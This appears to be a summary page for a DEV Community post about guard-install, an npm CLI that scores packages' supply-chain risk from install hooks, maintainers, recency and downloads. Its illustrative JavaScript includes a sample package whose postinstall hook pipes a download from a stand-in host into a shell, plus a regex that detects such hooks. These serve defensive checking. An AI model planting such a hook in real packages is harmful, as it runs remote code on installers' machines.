npm installs packages blindly — I built a CLI to fix that
Nithin D J developed a CLI tool called guard-install to analyze npm packages for potential security risks before installation. The tool evaluates package metadata, install scripts, and dependencies to generate a risk score and advises on safe installation practices. It aims to address the growing concern of supply chain attacks in the npm ecosystem.
- The CLI tool guard-install checks npm package metadata such as publish recency, maintainers, and download counts.
- It detects potentially dangerous install scripts such as postinstall and preinstall hooks.
- The tool scans dependencies up to a certain depth and calculates a risk level of LOW, MEDIUM, or HIGH.
- guard-install provides explanations for its risk assessment and recommends safe installation using --ignore-scripts.
- The project is in an early version (v0.1.1) and is available via GitHub and npm.
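As an added illustration of the kind of checks the bullets describe (example code written here, not guard-install's own source): it flags lifecycle hooks that run on `npm install`, scores publish recency, maintainer count and download volume, and maps the score to LOW/MEDIUM/HIGH. The hook list, thresholds, weights and field names are assumptions, the sample metadata is constructed, and dependency-depth scanning is left out.

```javascript
// Added example (not guard-install's code): heuristics over npm registry-style
// metadata. Hook list, thresholds and weights are assumptions for illustration.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Returns the lifecycle scripts that npm runs automatically during install.
function findInstallScripts(manifest) {
  const scripts = manifest.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Scores one package: returns { level, score, reasons }. `meta` mirrors the
// shape of a registry document (scripts, maintainers, time.modified);
// `weeklyDownloads` comes from the downloads API; `now` is injectable for tests.
function assessRisk(meta, weeklyDownloads, now = Date.now()) {
  const reasons = [];
  let score = 0;
  const hooks = findInstallScripts(meta);
  if (hooks.length) {
    score += 2;
    reasons.push(`runs ${hooks.map((h) => h.hook).join(', ')} on install`);
  }
  // A hook that fetches or pipes content into a shell is a much stronger signal.
  if (hooks.some((h) => /\b(curl|wget)\b|\|\s*sh\b/.test(h.command))) {
    score += 2;
    reasons.push('install script downloads or executes remote content');
  }
  const modified = meta.time && meta.time.modified ? Date.parse(meta.time.modified) : 0;
  const ageDays = (now - modified) / 86400000;
  if (ageDays < 7) { score += 1; reasons.push(`published ${Math.round(ageDays)} day(s) ago`); }
  if ((meta.maintainers || []).length < 2) { score += 1; reasons.push('single maintainer'); }
  if (weeklyDownloads < 1000) { score += 1; reasons.push(`only ${weeklyDownloads} weekly downloads`); }
  const level = score >= 4 ? 'HIGH' : score >= 2 ? 'MEDIUM' : 'LOW';
  if (level !== 'LOW') reasons.push('safer: npm install --ignore-scripts, then review the hooks');
  return { level, score, reasons };
}

// Constructed sample metadata (not a real package).
const SAMPLE_RISKY = {
  name: 'example-widget',
  scripts: { postinstall: 'curl -s https://example.invalid/setup | sh' },
  maintainers: [{ name: 'solo' }],
  time: { modified: '2024-05-01T00:00:00Z' },
};

console.log(assessRisk(SAMPLE_RISKY, 50, Date.parse('2024-05-03T00:00:00Z')));
```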
Opening excerpt (first ~120 words)

Nithin D J, posted on May 2

npm installs packages blindly — I built a CLI to fix that

#cli #npm #security #showdev

Hey everyone, I recently built a small CLI tool called guard-install that analyzes npm packages for potential risks before installing them.

👉 Try it: npx guard-install axios

The idea came from noticing how npm installs packages blindly, even though supply chain attacks and malicious packages are becoming more common.
…
Excerpt limited to ~120 words for fair-use compliance. The full article is at DEV Community.